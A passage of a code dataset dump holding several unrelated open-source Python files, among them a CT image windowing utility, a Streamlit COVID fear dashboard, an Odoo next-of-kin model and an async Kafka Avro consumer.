= image_dict[\"npy_image\"]\n return npy_image\n \ndef windowing(npy_image):\n\n queries = [\n [\"spine-bone\"],\n [\"chest-lungs\", \"chest-mediastinum\"],\n [\"abdomen-soft tissues\", \"abdomen-liver\"],\n ]\n\n stacked = []\n for q in queries:\n c = get_cfg(q)\n\n args = {\n \"name\": '_'.join(q),\n \"window_level\": [x[\"L\"] for x in c],\n \"window_width\": [x[\"W\"] for x in c],\n }\n\n WINDOW_LEVEL = [x[\"L\"] for x in c]\n WINDOW_WIDTH = [x[\"W\"] for x in c]\n\n window_min = None \n window_max = None\n if isinstance(WINDOW_LEVEL, List) and isinstance(WINDOW_WIDTH, List):\n for i, (l, w) in enumerate(zip(WINDOW_LEVEL, WINDOW_WIDTH)):\n window_min = l - (w // 2) if window_min is None else min(window_min, l - (w // 2))\n window_max = l + (w // 2) if window_max is None else max(window_max, l + (w // 2))\n elif isinstance(WINDOW_LEVEL, int) and isinstance(WINDOW_WIDTH, int):\n window_min = WINDOW_LEVEL - (WINDOW_WIDTH // 2)\n window_max = WINDOW_LEVEL + (WINDOW_WIDTH // 2)\n else: \n raise ValueError(\"WINDOW_LEVEL and WINDOW_WIDTH must be int or list of int\")\n\n img = np.clip(npy_image, window_min, window_max)\n img = 255 * ((img - window_min) / (window_max - window_min))\n img = img.astype(np.uint8)\n stacked.append(img)\n \n stacked = np.stack(stacked, axis=-1)\n\n return stacked\n \n\ndef windowing_ct(volume_path, out_dir):\n print(\"Processing test files\")\n test_fileid = osp.basename(volume_path).split(\".nii.gz\")[0] \n npy_image = convert_2_npy(volume_path)\n\n processed = windowing(npy_image)\n\n print(f'Extracting frames from {volume_path} into {out_dir}...')\n bar = progressbar.ProgressBar(max_value=processed.shape[0])\n\n # write to output_dir\n for frame_index, slice in enumerate(processed):\n cv2.imwrite((osp.join(out_dir, f\"{str(frame_index).zfill(4)}.jpg\")), slice)\n bar.update(frame_index)\n bar.finish()\n","repo_name":"nhtlongcs/ivos-gui","sub_path":"util/ct_volume/windowing_ct.py","file_name":"windowing_ct.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17821415364","text":"import streamlit as st\nimport numpy as np\nimport pandas as pd\nimport time\nimport altair as alt\nimport json\n\n@st.cache\ndef Your_Covid_Data():\n with open('repeated_data.json') as json_f:\n repeated_json = json.load(json_f)\n return alt.Data(values=repeated_json[\"features\"])\n\n@st.cache\ndef Your_World_Data():\n with open('world_data.json') as json_f:\n world_json = json.load(json_f)\n return alt.Data(values=world_json[\"features\"])\n\nst.title(\"How Data-Driven are our Covid fears?\")\n\nexpander = st.beta_expander(\"Instructions\")\nexpander.write(\"This visualization app allows you to view how the public sentiment of fear has changed in 15 countries as a result of the novel Coronavirus. By clicking a country on either of the two graphs below, you can view how the Fear Index varied in comparison to new Covid cases and deaths. \\n\\n By holding shift and pressing multiple countries you can view how Covid fear and Covid statistics vary among different countries. To learn more about Interesting Trends, the Fear Index and Variable Selection, please view the descriptions below. The graphs start at week 11 of the year 2020, which corresponds to the data March 9, 2020.\")\n\nrepeated_data = Your_Covid_Data()\nworld_data = Your_World_Data()\n\n\nmy_selector = alt.selection_multi(fields = [\"properties.location\"],init = [{\"properties.location\": \"United States\"},{\"properties.location\": \"India\"}])\n\nchart = alt.Chart(repeated_data,title = \"Percentage of Elderly and GDP for each Country\").mark_circle().encode(\n x = alt.X(\"properties.gdp_per_capita:Q\", title='GDP per Capita'),\n y=alt.Y(\"properties.aged_65_older:Q\", title='Percentage of Elderly'),\n # color=alt.condition(my_selector, alt.Color(\"properties.Continent:N\",title = \"Continent\"), alt.value('lightgray')),\n color=alt.condition(my_selector, alt.Color(\"properties.location:N\",title = \"Countries\"), alt.value('lightgray')),\n opacity = alt.condition(my_selector, alt.value(1.0), alt.value(0.15)),\n size=alt.Size(\"properties.population:Q\",scale=alt.Scale(domain=(-400000000, 1850000000)), legend=None),\n tooltip=alt.Tooltip('properties.location:N',title = \"Country\")\n \n).add_selection(\n my_selector\n).properties(\n width=300,\n height=200\n)\n\n\none_country = alt.Chart(repeated_data).mark_geoshape().encode(\n color= alt.condition(\n # my_selector, alt.Color(\"properties.Continent:N\"), alt.value('gray')\n my_selector, alt.Color(\"properties.location:N\",title = \"Countries\",scale=alt.Scale(scheme='tableau20'),legend = alt.Legend(orient=\"top\",columns=5, labelOpacity=0.8, columnPadding=67,clipHeight=12)), alt.value('gray')\n ),\n opacity = alt.condition(my_selector, alt.value(1.0), alt.value(0.15)),\n tooltip=alt.Tooltip('properties.location:N',title = \"Country\")\n).properties(\n width=375,\n height=200\n).add_selection(\n my_selector\n)\n\nworld = alt.Chart(world_data).mark_geoshape().encode(\n color=alt.value('lightgray'),\n tooltip=alt.Tooltip('properties.location:N',title = \"Country\")\n).properties( \n width=375,\n height=200\n)\n\n\nboundaries = alt.Chart(world_data, title='World Map').mark_geoshape(\n stroke='white',\n strokeWidth=1,\n fill=None\n)\n\n\nfear = alt.Chart(repeated_data, title='Twitter Fear over Time').mark_line().encode(\n x=alt.X('properties.week:O',title= \"Week\"),\n y=alt.Y('properties.fear_percentage:Q',title = \"Fear Index\"),\n color= alt.Color(\"properties.location:N\", legend = alt.Legend())\n # y=alt.Y('mean(properties.fear_percentage):Q',title = \"Fear Index\"),\n # color= alt.value(\"gray\")\n).transform_filter(\n my_selector\n).properties(\n width = 700,\n height = 150\n)\n\ncases = alt.Chart(repeated_data, title='Covid Infections over Time').mark_line().encode(\n x=alt.X('properties.week:O', title = \"Week\"),\n y=alt.Y('properties.new_cases_per_million:Q',title=\"New Cases per Million\"),\n color= alt.Color(\"properties.location:N\")\n).transform_filter(\n my_selector\n).properties(\n width = 700,\n height = 150\n)\n\ndeaths = alt.Chart(repeated_data, title='Covid Deaths over Time').mark_line().encode(\n x=alt.X('properties.week:O', title = \"Week\"),\n y=alt.Y('properties.new_deaths_per_million:Q',title=\"New Deaths per Million\"),\n color= alt.Color(\"properties.location:N\")\n).transform_filter(\n my_selector\n).properties(\n width = 700,\n height = 150\n)\n\n\nst.write((chart | world + one_country + boundaries) & fear & cases & deaths)\n\nexpander = st.beta_expander(\"Interesting Trends\")\nexpander.write(\"Have a look at how the Fear Index precedes the number of infections in first world countries. In most of these countries, the fear index halves by the time Covid cases hit their peak. Do we just become bored when the pandemic is most deadly? \\n\\nNotice how the death rate is very low in UAE compared to in Ireland; perhaps the lower percentage of elderly could explain this. \\n\\n Have a look at Covid infections and deaths in third world countries. Could a lack of testing explain the low cases and deaths even when fear is high? \\n\\n Maybe look at how similar the fear and Covid trends are within countries of the same continent, maybe shared cultural and geographical aspects could be the reason?\")\n\nexpander = st.beta_expander(\"What is the Fear Index\")\nexpander.write(\"The Fear Index is the percentage of Covid-related tweets that contain keywords related to fear. These keywords include conjugations of synonyms of 'fear' such as 'scared', 'afraid' and 'nervous'. \\n\\n To collect the Tweets, we utilize the publically available Harvard 'Coronavirus Tweet Ids' dataset.\")\n\nexpander = st.beta_expander(\"Variable Selection\")\nexpander.write(\"The variables GDP per Capita and percentage of population above 65 were chosen because our intuition would tell us that our Covid fears should increase as these variables increase. This is because Covid is more dangerous when hospital beds cannot be afforded or when it affects a member of the elderly.\")\n","repo_name":"CMU-IDS-2020/a3-b-c","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5990416082","text":"from ctypes import CDLL, c_int, c_double, POINTER\nimport numpy as np\nfrom config import get_library_path\n\nlibrary = CDLL(get_library_path(\"eigen\"))\n\nc_int_p = POINTER(c_int)\nc_double_p = POINTER(c_double)\n\n_solve_eigen_icholt_coo = library.solve_eigen_icholt_coo\n_solve_eigen_icholt_coo.restype = c_int\n_solve_eigen_icholt_coo.argtypes = [\n c_double_p,\n c_int_p,\n c_int_p,\n c_int,\n c_double_p,\n c_double_p,\n c_int,\n c_double,\n c_double,\n]\n\n_solve_eigen_cholesky_coo = library.solve_eigen_cholesky_coo\n_solve_eigen_cholesky_coo.restype = c_int\n_solve_eigen_cholesky_coo.argtypes = [\n c_double_p,\n c_int_p,\n c_int_p,\n c_int,\n c_double_p,\n c_double_p,\n c_int,\n]\n\n\ndef solve_eigen_icholt_coo(\n coo_data,\n row,\n col,\n b,\n rtol=1e-10,\n initial_shift=0.01,\n):\n assert coo_data.flags[\"C_CONTIGUOUS\"]\n assert row.flags[\"C_CONTIGUOUS\"]\n assert col.flags[\"C_CONTIGUOUS\"]\n assert b.flags[\"C_CONTIGUOUS\"]\n assert coo_data.dtype == np.float64\n assert b.dtype == np.float64\n assert row.dtype == np.int32\n assert col.dtype == np.int32\n assert coo_data.shape[0] == row.shape[0]\n assert coo_data.shape[0] == col.shape[0]\n\n n = b.shape[0]\n nnz = coo_data.shape[0]\n\n x = np.empty(n)\n\n err = _solve_eigen_icholt_coo(\n np.ctypeslib.as_ctypes(coo_data),\n np.ctypeslib.as_ctypes(row.ravel()),\n np.ctypeslib.as_ctypes(col.ravel()),\n nnz,\n np.ctypeslib.as_ctypes(b),\n np.ctypeslib.as_ctypes(x),\n n,\n rtol,\n initial_shift,\n )\n\n if err:\n raise ValueError(\"Linear system could not be solved\")\n\n return x\n\n\ndef solve_eigen_cholesky_coo(coo_data, row, col, b):\n assert coo_data.flags[\"C_CONTIGUOUS\"]\n assert row.flags[\"C_CONTIGUOUS\"]\n assert col.flags[\"C_CONTIGUOUS\"]\n assert b.flags[\"C_CONTIGUOUS\"]\n assert coo_data.dtype == np.float64\n assert b.dtype == np.float64\n assert row.dtype == np.int32\n assert col.dtype == np.int32\n assert coo_data.shape[0] == row.shape[0]\n assert coo_data.shape[0] == col.shape[0]\n\n n = b.shape[0]\n nnz = coo_data.shape[0]\n\n x = np.empty(n)\n\n err = _solve_eigen_cholesky_coo(\n np.ctypeslib.as_ctypes(coo_data),\n np.ctypeslib.as_ctypes(row.ravel()),\n np.ctypeslib.as_ctypes(col.ravel()),\n nnz,\n np.ctypeslib.as_ctypes(b),\n np.ctypeslib.as_ctypes(x),\n n,\n )\n\n if err:\n raise ValueError(\"Linear system could not be solved\")\n\n return x\n\n\ndef main():\n import scipy.sparse\n\n np.random.seed(0)\n\n n = 100\n k = 20 * n\n\n i = np.random.randint(n, size=k)\n j = np.random.randint(n, size=k)\n v = np.random.rand(k)\n i_inds = np.concatenate([i, j, np.arange(n)]).astype(np.int32)\n j_inds = np.concatenate([j, i, np.arange(n)]).astype(np.int32)\n coo_values = np.concatenate([v, v, n * np.ones(n)])\n\n A = scipy.sparse.coo_matrix((coo_values, (i_inds, j_inds)), (n, n))\n A.sum_duplicates()\n\n x_true = np.random.rand(n)\n b = A.dot(x_true)\n\n solvers = [\n solve_eigen_icholt_coo,\n solve_eigen_cholesky_coo,\n ]\n\n for solver in solvers:\n x = solver(A.data, A.row, A.col, b)\n\n err = np.linalg.norm(x - x_true)\n\n print(\"norm(x - x_true) = %e \" % err)\n\n assert err < 1e-5\n\n print(\"test passed\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pymatting/pymatting","sub_path":"benchmarks/solve_eigen.py","file_name":"solve_eigen.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":1613,"dataset":"github-code","pt":"53"} +{"seq_id":"73722720487","text":"from lino.api import ad, _\n\n\nclass Plugin(ad.Plugin):\n verbose_name = _(\"Shopping\")\n needs_plugins = ['lino_xl.lib.contacts', 'lino_xl.lib.sales']\n menu_group = \"sales\"\n\n journal_ref = \"SLS\"\n \"\"\"The reference of the journal where shopping invoices will be created.\"\"\"\n\n def get_quicklinks(self, user):\n yield 'products.Products'\n yield 'shopping.MyCart.start_plan'\n\n def setup_main_menu(self, site, user_type, m):\n mg = self.get_menu_group()\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('shopping.MyAddresses')\n m.add_action('shopping.MyCart.start_plan')\n\n def setup_config_menu(self, site, user_type, m):\n mg = self.get_menu_group()\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('shopping.DeliveryMethods')\n\n def setup_explorer_menu(self, site, user_type, m):\n mg = self.get_menu_group()\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('shopping.AllCarts')\n m.add_action('shopping.AllAddresses')\n","repo_name":"lino-framework/xl","sub_path":"lino_xl/lib/shopping/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11065020488","text":"import os\nimport doc_cleaner\nfrom nltk import sent_tokenize\nfrom nltk import word_tokenize\nimport pickle\nimport json\n\n\nTEXT = \"section_text.txt\"\nINPUT_DIRECTORY = 'data_extraction/KB'\nOUTPUT_FILE_NAME = 'sentence_similarity/data/sentence_section_pairs.txt'\nPICKLE_FILE_NAME = 'sentence_similarity/data/sentence_section_pairs.pkl'\nJSON_FILE_NAME = 'sentence_similarity/data/sentence_section_pairs.json'\nsentences_with_section = []\nsentence_set = set()\n\ndef tokenize_section(section_text):\n cleaned_section = doc_cleaner.clean_section(section_text)\n sentences = sent_tokenize(cleaned_section)\n sentences = [s for s in sentences if len(word_tokenize(s)) >= 7 and s not in sentence_set] \n \n # Add each sentence to the sentence_set\n for sentence in sentences:\n sentence_set.add(sentence)\n print(\"sentence set size so far: \", len(sentence_set))\n \n return sentences\n\n\ndef add_sections(directory):\n\n # check if section_test.txt file exists in directory\n if os.path.isfile(os.path.join(directory, TEXT)):\n with open(os.path.join(directory, TEXT), 'r') as f:\n contents = f.read()\n\n sentences = tokenize_section(contents)\n \n # Append (sentence, section) for each sentence in sentences\n for sentence in sentences:\n section = directory.split('KB')[1]\n sentences_with_section.append((sentence, section))\n\n for file in sorted(os.scandir(directory), key=lambda f: f.name):\n if os.path.isdir(file.path):\n add_sections(file.path)\n \n return sentences_with_section\n\n\nif __name__==\"__main__\":\n \n sentence_section_pairs = add_sections(INPUT_DIRECTORY)\n #print(sentence_section_pairs[:10])\n\n # Write to pickle file\n with open(PICKLE_FILE_NAME, 'wb') as f:\n pickle.dump(sentence_section_pairs, f)\n\n\n # Write to txt file\n with open(OUTPUT_FILE_NAME, 'w') as f:\n for pair in sentence_section_pairs:\n f.write(f\"SENTENCE: {pair[0]}\\nSECTION: {pair[1]}\\n \\n\")\n\n # Write to json file\n with open(JSON_FILE_NAME, 'w', encoding='utf-8') as f:\n json.dump(sentence_section_pairs, f, ensure_ascii=False)\n","repo_name":"iestynmullinor/honsProject","sub_path":"data_extraction/create_sentence_token_list.py","file_name":"create_sentence_token_list.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35999639125","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom setuptools import setup\n\ninstall_requires = [\n 'minion-backend',\n 'pyasn1',\n 'pyopenssl',\n 'pyasn1_modules'\n]\n\nsetup(name=\"minion-ev-plugin\",\n version=\"0.1\",\n description=\"EV SSL/TLS Plugin for Minion\",\n url=\"https://github.com/dchan/minion-ev-plugin/\",\n author=\"Mozilla\",\n author_email=\"minion@mozilla.com\",\n packages=['minion', 'minion.plugins'],\n namespace_packages=['minion', 'minion.plugins'],\n include_package_data=True,\n install_requires = install_requires)\n","repo_name":"dchanm/minion-ev-plugin","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6502990198","text":"from odoo import models, fields, api, _\nimport random\nimport string\n\n\nclass KgNextOfKin(models.Model):\n _name = 'kg.associated.parties'\n\n _inherit = ['mail.thread', 'mail.activity.mixin']\n _mail_post_access = 'read'\n _description = 'Kg Next Of Kin'\n\n name = fields.Char(string='Name', copy=False, readonly=True, index=True, default=lambda self: _('New'))\n \"\"\"mandatory fields\"\"\"\n\n set_id=fields.Char(string=\"Set ID – NK1\")\n first_name=fields.Char(string=\"First Name\")\n relationship=fields.Char(string=\"Relationship\")\n address=fields.Text(string=\"Address\")\n cell_phn_no = fields.Char(string=\"Cell Phone\")\n business_phn_no = fields.Char(string=\"Business Phone Number\")\n emergency_contact = fields.Char(string=\"Contact Role\")\n start_date = fields.Date('Start Date')\n end_date = fields.Date('End Date')\n organization_name = fields.Char(string=\"Organization Name – NK1\")\n contact_persons_name = fields.Char(string=\"Contact Person's Name\")\n contact_persons_phn_no = fields.Char(string=\"Contact Person's Telephone Number\")\n\n \"\"\"non mandatory fields\"\"\"\n\n middle_name = fields.Char(string=\"Middle Name\")\n last_name = fields.Char(string=\"last Name\")\n home_phn_no = fields.Char(string=\"Home Phone\")\n email = fields.Char(string=\"email\")\n nok_job_title = fields.Char(string=\"Next of Kin/Associated Parties Job Title\")\n nok_job_code = fields.Char(string=\"Next of Kin / Associated Parties Job Code/Class\")\n nok_job_emp_no = fields.Char(string=\"Next of Kin / Associated Parties Employee Number\")\n maritual_status = fields.Selection([('married', 'Married'), ('unmarried', 'Unmarried')], default=None,\n string=\"Marital Status\")\n administrative_sex = fields.Selection([('male', 'Male'), ('female', 'Female'), ('unknown', 'Unknown')],\n default=None,\n string=\"Administrative Sex\")\n birth_date = fields.Datetime('Date/Time of Birth')\n living_dependency = fields.Char(string=\"Living Dependency\")\n ambulatory_status = fields.Char(string=\"Ambulatory Status\")\n citizenship = fields.Char(string=\"Citizenship\")\n primary_lang = fields.Many2one('res.lang', string=\"Primary Language\")\n living_arrangement = fields.Char(string=\"Living Arrangement\")\n publicity_code = fields.Selection([('Family', 'F'), ('No Publicity', 'N'), ('Other,', 'O'),\n ('Unknown', 'U')],\n help=\"F for Family,N for No Publicity and O for Other,U for Unknown\",\n string=\"Publicity Code\")\n protection_indicator = fields.Selection([('Yes', '1'), ('No', '0'), ('not available,', 'None')],\n help=\"1 for Yes,0 for No and None for Not available\",\n string=\"Protection Indicator\")\n\n student_indicator = fields.Char(string=\"Student Indicator\")\n religion = fields.Char(string=\"Religion\")\n mothers_name = fields.Char(string=\"Mother's Maiden Name\")\n nationality = fields.Many2one('res.country', string='Nationality')\n ethnic_group = fields.Char(string=\"Ethnic Group\")\n contact_reason = fields.Char(string=\"Contact Reason\")\n contact_persons_addres = fields.Text(string=\"Contact Person's Address\")\n nok_identifiers= fields.Char(string=\"Next of Kin/Associated Party's Identifiers\")\n job_status= fields.Char(string=\"Job Status\")\n race= fields.Char(string=\"Race\")\n handicap = fields.Boolean(string=\"Handicap\")\n contact_persn_secrty_no = fields.Char(string=\"Contact Person Social Security Number\")\n nok_birth_place = fields.Char(string=\"Next of Kin Birth Place\")\n vip_indicator = fields.Char(string=\"VIP Indicator\")\n\n state = fields.Selection([('draft', 'Draft'),('submited','Submitted'),('cancel','Cancel')],string='Status', default='draft')\n\n\n @api.model\n def create(self, vals):\n if vals.get('name', _('New')) == _('New'): vals['name'] = self.env['ir.sequence'].next_by_code(\n 'kg.associated.parties') or _('New')\n request = super(KgNextOfKin, self).create(vals)\n return request\n\n def btn_submit(self):\n self.write({'state': 'submited'})\n url = self.env['ir.config_parameter'].get_param('web.base.url')\n data = {\n 'set_id' : self.set_id,\n 'first_name' : self.first_name,\n 'relationship' : self.relationship,\n 'address' : self.address,\n 'cell_phn_no' : self.cell_phn_no,\n 'business_phn_no' : self.business_phn_no,\n 'emergency_contact' : self.emergency_contact,\n # 'start_date' : self.start_date,\n # 'end_date' : self.end_date,\n 'organization_name' : self.organization_name,\n 'contact_persons_name' : self.contact_persons_name,\n 'contact_persons_phn_no' : self.contact_persons_phn_no,\n 'middle_name' : self.middle_name,\n 'last_name' : self.last_name,\n 'home_phn_no' : self.home_phn_no,\n 'email' : self.email,\n 'nok_job_title' : self.nok_job_title,\n 'nok_job_code' : self.nok_job_code,\n 'nok_job_emp_no' : self.nok_job_emp_no,\n 'maritual_status' : self.maritual_status,\n 'administrative_sex' : self.administrative_sex,\n # 'birth_date' : self.birth_date,\n 'living_dependency' : self.living_dependency,\n 'ambulatory_status' : self.ambulatory_status,\n 'citizenship' : self.citizenship,\n 'primary_lang' : self.primary_lang.name,\n 'living_arrangement' : self.living_arrangement,\n 'publicity_code' : self.publicity_code,\n 'protection_indicator' : self.protection_indicator,\n 'student_indicator' : self.student_indicator,\n 'religion' : self.religion,\n 'mothers_name' : self.mothers_name,\n 'nationality' : self.nationality.name,\n 'ethnic_group' : self.ethnic_group,\n 'contact_reason' : self.contact_reason,\n 'contact_persons_addres' : self.contact_persons_addres,\n 'nok_identifiers' : self.nok_identifiers,\n 'job_status' : self.job_status,\n 'race' : self.race,\n 'handicap' : self.handicap,\n 'contact_persn_secrty_no' : self.contact_persn_secrty_no,\n 'nok_birth_place' : self.nok_birth_place,\n 'vip_indicator' : self.vip_indicator,\n\n }\n response_data = self.env['tdcc.api'].post(data, url)\n\n\n def btn_cancel(self):\n print(\"mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm\")\n self.write({'state': 'cancel'})","repo_name":"Anaswarap/odoo_klystron","sub_path":"kg_tdcc_api/models/next_of_kin.py","file_name":"next_of_kin.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7733517248","text":"import torch\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom tqdm import tqdm\n\n\nclass Net(torch.nn.Module):\n def __init__(self, model):\n super(Net, self).__init__()\n self.model = model\n\n def save_output(module, Input, output):\n self.buffer = output\n self.model.avgpool.register_forward_hook(save_output)\n\n def forward(self, x):\n self.model(x)\n return self.buffer\n\n\nif __name__ == '__main__':\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n model = torch.load('result/CNN1/epoch_20.model')\n test_feautures = torch.load(\"CNN_Data/test_features.tov\")\n test_labels = torch.load('CNN_Data/test_labels.tov')\n test_set = TensorDataset(test_feautures, test_labels)\n bs = 64\n test_loader = DataLoader(test_set, batch_size=bs, shuffle=False)\n\n net = Net(model)\n net.eval()\n net.cuda()\n Tot_Features = []\n tot_labels = []\n for Idx, (data, labels) in enumerate(tqdm(test_loader)):\n batchlen = len(data)\n data = data.to(device)\n result = net(data)\n result = result.detach().cpu()\n result = result.reshape((batchlen, -1))\n Tot_Features.append(result)\n tot_labels.append(labels)\n\n Tot_Features = torch.cat(Tot_Features, 0)\n tot_labels = torch.cat(tot_labels, 0)\n print(Tot_Features.shape)\n torch.save(Tot_Features, 'tot_test_features.tov')\n torch.save(tot_labels, 'tot_test_labels.tov')\n","repo_name":"zengkaipeng/Machine_Learning","sub_path":"Get_CNN_Feature.py","file_name":"Get_CNN_Feature.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16399591658","text":"import argparse\nimport os\nimport uuid\nfrom typing import Dict, List\n\nfrom aiokafka import AIOKafkaConsumer, ConsumerRecord, TopicPartition, AIOKafkaProducer\nfrom confluent_kafka import Consumer\nfrom confluent_kafka.serialization import SerializationContext, MessageField, SerializationError\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroDeserializer, AvroSerializer\nimport traceback as tb\nfrom confluent_kafka.serialization import StringSerializer\n\nfrom db.kafka_to_db import search_and_insert\nfrom models.person import Person, Error\nimport asyncio\n\n\n# from confluent_kafka.schema_registry.\n\n\n# class User:\n# \"\"\"\n# User record\n#\n# Args:\n# name (str): User's name\n#\n# favorite_number (int): User's favorite number\n#\n# favorite_color (str): User's favorite color\n# \"\"\"\n#\n# def __init__(self, id, first_name, middle_name, last_name, dob, address):\n# self.id = id\n# self.first_name = first_name\n# self.middle_name = middle_name\n# self.last_name = last_name\n# self.dob = dob\n# self.address = address\n\n\n# def address_to_dict(addresses: List[Address]):\n# \"\"\"\n# Returns a dict representation of a User instance for serialization.\n#\n# Args:\n# user (User): User instance.\n#\n# ctx (SerializationContext): Metadata pertaining to the serialization\n# operation.\n#\n# Returns:\n# dict: Dict populated with user attributes to be serialized.\n# :param addresses:\n# \"\"\"\n#\n# address_dict = [address.model_dump() for address in addresses]\n# return address_dict\n\n\n# def person_to_dict(person: Person, ctx):\n# \"\"\"\n# Returns a dict representation of a User instance for serialization.\n#\n# Args:\n# person (User): User instance.\n#\n# ctx (SerializationContext): Metadata pertaining to the serialization\n# operation.\n#\n# Returns:\n# dict: Dict populated with user attributes to be serialized.\n# \"\"\"\n# person_dict = dict(id=person.id, first_name=person.first_name, last_name=person.last_name, dob=person.dob\n# , address=address_to_dict(person.address)\n# )\n# return person_dict\n\n\ndef dict_to_user(obj, ctx):\n \"\"\"\n Converts object literal(dict) to a User instance.\n\n Args:\n obj (dict): Object literal(dict)\n\n ctx (SerializationContext): Metadata pertaining to the serialization\n operation.\n \"\"\"\n\n if obj is None:\n return None\n print(obj)\n return Person(id=obj['id'],\n first_name=obj['first_name'],\n middle_name=obj['middle_name'],\n last_name=obj['last_name'],\n dob=obj['dob'],\n address=obj['address']\n )\n\n\ndef error_to_dict(error: Error, ctx):\n \"\"\"\n Returns a dict representation of a User instance for serialization.\n\n Args:\n person (User): User instance.\n\n ctx (SerializationContext): Metadata pertaining to the serialization\n operation.\n\n Returns:\n dict: Dict populated with user attributes to be serialized.\n \"\"\"\n error_dict = dict(errorType=error.errorType, errorDesc=error.errorDesc)\n\n return error_dict\n\n\nasync def main():\n topic = \"person\"\n # is_specific = args.specific == \"true\"\n\n # schema = \"person_nested.avsc\"\n\n sr_conf = {'url': 'http://localhost:8081'}\n schema_registry_client = SchemaRegistryClient(sr_conf)\n schema_str: str = get_schema()\n error_schema: str = get_error_schema()\n avro_deserializer = AvroDeserializer(schema_registry_client,\n schema_str,\n dict_to_user)\n\n ################################ ERROR SENDING PRODUCER #############################################\n\n # id: uuid.UUID = uuid.uuid4()\n\n ################################ ERROR SENDING PRODUCER #############################################\n\n consumer_conf = {'bootstrap.servers': 'localhost:9092',\n 'group.id': 'test',\n 'auto.offset.reset': \"latest\",\n }\n\n # consumer = AIOKafkaConsumer(bootstrap_servers='localhost:9092',\n # group_id='test',\n # auto_offset_reset='earliest'\n # )\n\n # consumer = AIOKafkaConsumer(*consumer_conf,)\n consumer = AIOKafkaConsumer(bootstrap_servers=\"localhost:9092\", group_id=\"test\", auto_offset_reset=\"latest\",\n enable_auto_commit=False\n )\n\n consumer.subscribe([topic])\n await consumer.start()\n while True:\n try:\n\n # SIGINT can't be handled when polling, limit timeout to 1 second.\n messages: Dict[TopicPartition, List[ConsumerRecord]] = await consumer.getmany(timeout_ms=1500)\n print(\"polling...\")\n # print(msg.value())\n if messages is None:\n continue\n for message in messages.values():\n msg = message.pop()\n try:\n user = avro_deserializer(msg.value, SerializationContext(msg.topic, MessageField.VALUE))\n\n if user is not None:\n # print(\"User record with key {}: id : {}\\n\"\n # \"\\tfirst Name: {}\\n\"\n # \"\\tlast name: {}\\n\"\n # .format(msg.key(), user.id , user.first_name, user.last_name))\n print(\n f'{user.id} , First Name = {user.first_name}, Last Name = {user.last_name} , Address = {user.address}'\n\n )\n # search the person table by id\n await search_and_insert(user.id, user.first_name, user.last_name, user.dob)\n\n except SerializationError as e:\n tb.print_exc()\n errorDesc: str = ''.join(tb.format_exception(None, e, e.__traceback__))\n print(msg.value)\n print(\"Inside Serialization Exception block\")\n print(e)\n string_serializer = StringSerializer('utf_8')\n producer = AIOKafkaProducer(bootstrap_servers='localhost:9092')\n avro_serializer = AvroSerializer(schema_registry_client,\n error_schema,\n error_to_dict)\n\n error = Error(errorType=\"SerializationError\", errorDesc=errorDesc)\n await producer.start()\n\n # send to dead letter queue\n # result = await producer.send(topic=\"deadletterqueue\",\n # value=error)\n\n await producer.send(topic=\"deadletterqueue\",\n key=string_serializer(str(uuid.uuid4())),\n value=avro_serializer(error, SerializationContext(\"deadletterqueue\",\n MessageField.VALUE))\n )\n\n await producer.flush()\n # await producer.stop()\n\n await consumer.commit()\n except KeyboardInterrupt as li:\n print(li)\n except Exception as error:\n print(error)\n await consumer.commit()\n\n await consumer.stop()\n\n\ndef get_error_schema() -> str:\n # pass\n path = os.path.realpath(os.path.dirname(__file__))\n with open(f\"{path}/schema/error.avsc\") as f:\n error_schema_str = f.read()\n print(error_schema_str)\n return error_schema_str\n\n\ndef get_schema() -> str:\n \"\"\"\n search for the latest schema\n\n :return: schema str\n \"\"\"\n schema_registry_conf = {'url': \"http://localhost:8081\"}\n sr = SchemaRegistryClient(schema_registry_conf)\n return sr.get_latest_version(subject_name='person-value').schema.schema_str\n\n\nif __name__ == '__main__':\n # parser = argparse.ArgumentParser(description=\"AvroDeserializer example\")\n # parser0.add_argument('-b', dest=\"bootstrap_servers\", required=True,\n # help=\"Bootstrap broker(s) (host[:port])\")\n # parser.add_argument('-s', dest=\"schema_registry\", required=True,\n # help=\"Schema Registry (http(s)://host[:port]\")\n # parser.add_argument('-t', dest=\"topic\", default=\"example_serde_avro\",\n # help=\"Topic name\")\n # parser.add_argument('-g', dest=\"group\", default=\"example_serde_avro\",\n # help=\"Consumer group\")\n # parser.add_argument('-p', dest=\"specific\", default=\"true\",\n # help=\"Avro specific record\")\n\n try:\n # result = loop.run_until_complete(main())\n # loop = asyncio.get_event_loop()\n # io.run(main())\n # consumer_task = loop.create_task(main())\n # loop.run_until_complete(main())\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n\n\n except 